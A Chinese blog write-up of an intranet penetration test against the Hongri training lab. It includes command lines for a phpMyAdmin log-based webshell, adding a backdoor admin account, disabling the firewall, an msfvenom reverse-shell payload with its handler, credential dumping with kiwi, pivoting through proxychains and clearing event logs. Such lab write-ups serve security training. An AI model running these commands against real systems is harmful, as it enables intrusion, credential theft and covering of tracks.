红日靶场1

记一次内网渗透

红日靶场下载地址:漏洞详情

靶场地址分配:

模拟外网网段:192.168.174.0/24

模拟内网网段:192.168.52.0/24

攻击机:

kali:192.168.174.131

靶机:

域控服务器2008:192.168.52.138(内网)

域成员2003:192.168.52.141(内网)

Win7: 192.168.52.143(内网)

192.168.174.130(外网)

红日靶场1_第1张图片

1.信息收集

使用nmap对192.168.174.130进行扫描

红日靶场1_第2张图片

对目录进行扫描,发现phpmyadmin页面

红日靶场1_第3张图片

2.GETSHELL

弱口令root/root登录界面

使用日志漏洞

红日靶场1_第4张图片

开启日志功能,并设置日志路径

写入一句话木马,并用蚁剑链接

红日靶场1_第5张图片

在后台建立新用户,并赋予管理员权限--权限维持

net user 账户 密码 /add
管理员权限,所有直接加
net localgroup administrators admin /add

红日靶场1_第6张图片

3.后渗透

关闭防火墙

netsh advfirewall show allprofile state
netsh advfirewall set allprofiles state off

红日靶场1_第7张图片

开启3389

run post/windows/manage/enable_rdp
rdesktop 192.168.174.130:3389

msf生成木马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.174.131 LPORT=4444 -f exe -o brian.exe

将木马上传到肉鸡

红日靶场1_第8张图片

开启msfconsole并监听:

use exploit/multi/handler

设置tcp监听:

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.174.131

exploit

运行肉鸡上的木马

信息查看

 whoami                                                         # 查看当前用户名
 whoami /all                                                    # 获取域SID
 ipconfig /all                                                  # 网络配置文件
 route print                                                    # 打印路由信息
 arp -a                                                   # 查看arp缓存,可以发现内网主机
 systeminfo                                                     # 操作系统信息
 echo %PROCESSOR_ARCHITECTURE%                                  # 系统体系架构
 tasklist /v                                                    # 本机进程
 net statistics workstation                                     # 主机开机时间
 net user                                                        # 查看本地用户
 net localgroup administrators                        # 查看本地管理员组(通常包含域用户)
 net user xxx                                                    # 查看指定用户详细信息
​

红日靶场1_第9张图片

进程迁移

ps migrate 512 # 默认是加载32位的系统,所以如果目标主机是64位系统的话,需要将进程迁移到一个64位程序的进程中 load kiwi # 加载kiwi模块 creds_all # 列举系统中的明文密码

红日靶场1_第10张图片

权限提升

红日靶场1_第11张图片

4.横向移动

配置静态路由(可以后台运行,使用永恒之蓝打域控)

run autoroute 192.168.52.0/24

使用代理(为了在msf之外访问内网,只好设计一个代理)

红日靶场1_第12张图片

设置代理服务器

红日靶场1_第13张图片

配置代理文件

vim /etc/proxychains.conf

对内网进行端口扫描

红日靶场1_第14张图片

5.清理痕迹

meterperter清除日志功能: clearev #清除windows中的应用程序日志、系统日志、安全日志

你可能感兴趣的:(内网横向,运维)